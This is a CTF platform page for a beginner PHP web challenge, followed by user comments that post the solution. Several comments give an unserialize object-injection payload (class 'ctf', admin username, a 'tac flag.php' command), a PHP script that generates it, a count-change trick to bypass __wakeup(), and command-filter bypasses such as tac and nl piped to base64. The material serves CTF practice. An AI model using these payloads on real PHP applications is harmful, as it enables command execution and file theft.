安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1972
提  示:
描  述:
flag{}
评论
iamblue 1月前

O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00%2A%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6%3A%22%00%2A%00cmd%22%3Bs%3A12%3A%22tac+flag.php%22%3B%7D

回复 1

tfios 2月前

环境变量里边也有 FLAG

回复 0

LLTVLL 6月前

AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。

回复 0

Bojing 11月前

有哪里提示了username是admin的吗

回复 0
numberone 10月前

源代码里不是有个if语句:if ($this->username === 'admin')

回复 1

18956160518 1年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 1

EtHat 1年前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 1年前

nl flag.php|base64

回复 0

不会编程的崽 1年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 1年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 1年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

看writeup刷题 攻破了该题 19小时前
288728 攻破了该题 20小时前
songci1 攻破了该题 1天前
789123 攻破了该题 6天前
tingsi464 攻破了该题 7天前
雾島风起時 攻破了该题 7天前
forces 攻破了该题 8天前
liujiahaoctf 攻破了该题 10天前
卯壬在此 攻破了该题 10天前
33538626867 攻破了该题 11天前
nina123 攻破了该题 11天前
qgys 攻破了该题 13天前
19189756057 攻破了该题 14天前
Wsss12 攻破了该题 15天前
shangss 攻破了该题 15天前
ymkiras 攻破了该题 15天前
c2F1eQ 攻破了该题 17天前
11111in 攻破了该题 19天前
jiangnanwithrain 攻破了该题 20天前
KKsama 攻破了该题 20天前
问题反馈